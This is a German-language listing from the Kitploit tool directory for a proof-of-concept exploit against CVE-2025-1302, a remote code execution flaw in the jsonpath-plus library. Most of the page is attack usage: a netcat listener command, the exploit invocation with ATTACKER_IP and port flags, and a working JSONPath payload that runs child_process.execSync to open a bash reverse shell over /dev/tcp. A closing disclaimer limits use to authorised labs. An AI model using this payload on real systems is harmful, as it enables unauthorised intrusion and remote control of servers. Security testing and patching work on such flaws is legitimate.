Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — PoC-Exploit und Demo eines verwundbaren Servers für CVE-2025-1302 in jsonpath-plus. | Kitploit
Tools/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung
GitHubabrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

PoC-Exploit und Demo eines verwundbaren Servers für CVE-2025-1302 in jsonpath-plus.

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-1302 JSONPath-Plus RCE PoC

Name des PoC-Skripts: poc.py

Ein Proof-of-Concept-Exploit-Skript für CVE-2025-1302, das eine RCE-Sicherheitslücke in der jsonpath-plus-Bibliothek ausnutzt. Wenn es gegen einen verwundbaren Dienst-Endpunkt ausgeführt wird, versucht das Skript, über eine JSONPath-Nutzlast eine entfernte Codeausführung auszulösen und eine Reverse-Shell zum Angreifer aufzubauen.


Funktionen

  • Flexible HTTP-Methoden: Unterstützt POST, GET oder AUTO (POST mit GET-Fallback) über die Flags --method oder --no-fallback.
  • Benutzerdefinierte Nutzlasten: Laden Sie eine oder mehrere JSONPath-RCE-Nutzlastvorlagen aus einer Datei, mit Platzhaltern für {ip} und {port}.
  • Eingebaute Standard-Nutzlast: Wenn keine Nutzlastdatei angegeben wird, wird eine vollständige Bash-Reverse-Shell-Vorlage verwendet.
  • Ausführliches Debugging: Gibt bei Fehlschlag sowohl den vollständigen Request- als auch Response-Body (POST und GET) aus.
  • Fortschrittsanzeigen: Zeigt Verzögerungs- und Nutzlastschleifen mit tqdm-Fortschrittsbalken an.
  • Protokollierung: Optional können alle Ergebnisse mit --output in eine JSON-Datei gespeichert werden.
  • Installation

    1. Klonen Sie dieses Repository:

      root@kitploit:~
      git clone https://github.com/yourorg/jsonpath-rce-poc.git
      cd jsonpath-rce-poc
      
    2. Installieren Sie die Abhängigkeiten (erfordert Python 3.6+):

      root@kitploit:~
      pip install -r requirements.txt
      

    Verwendung

    1. Starten Sie einen Listener auf Ihrem Angreifer-Rechner (Port bei Bedarf anpassen):

      root@kitploit:~
      nc -lvnp 9999
      
    2. Führen Sie das PoC aus:

      root@kitploit:~
      python3 poc.py \
        --url http://TARGET_HOST:PORT/query \
        --ip ATTACKER_IP --port 9999 \
        [--payload-file payloads.txt] \
        [--delay 5] \
        [--method AUTO|POST|GET] \
        [--no-fallback] \
        [--output results.json]
      
    • --payload-file: Datei mit einem JSONPath-Nutzlast-Eintrag pro Zeile. Verwenden Sie die Platzhalter {ip} und {port}.
    • --delay: Sekunden, die vor dem Senden der Nutzlasten gewartet werden sollen (zeigt Countdown an).
    • --method: Erzwingt POST, GET oder AUTO (Standard).
    • --no-fallback: Kurzbefehl, um einen GET-Wiederholungsversuch zu überspringen (entspricht --method POST).
    • --output: Pfad zur JSON-Protokolldatei der Versuche.

    Beispiel einer Nutzlast-Datei

    root@kitploit:~
    $[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
    

    Beitrag

    1. Forken Sie das Repository und erstellen Sie einen Feature-Branch.
    2. Reichen Sie einen Pull-Request mit Ihren Änderungen ein.

    Haftungsausschluss

    Verwenden Sie dieses Skript nur in kontrollierten Laborumgebungen gegen Systeme, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Missbrauch kann illegal und unethisch sein.

    Tool herunterladen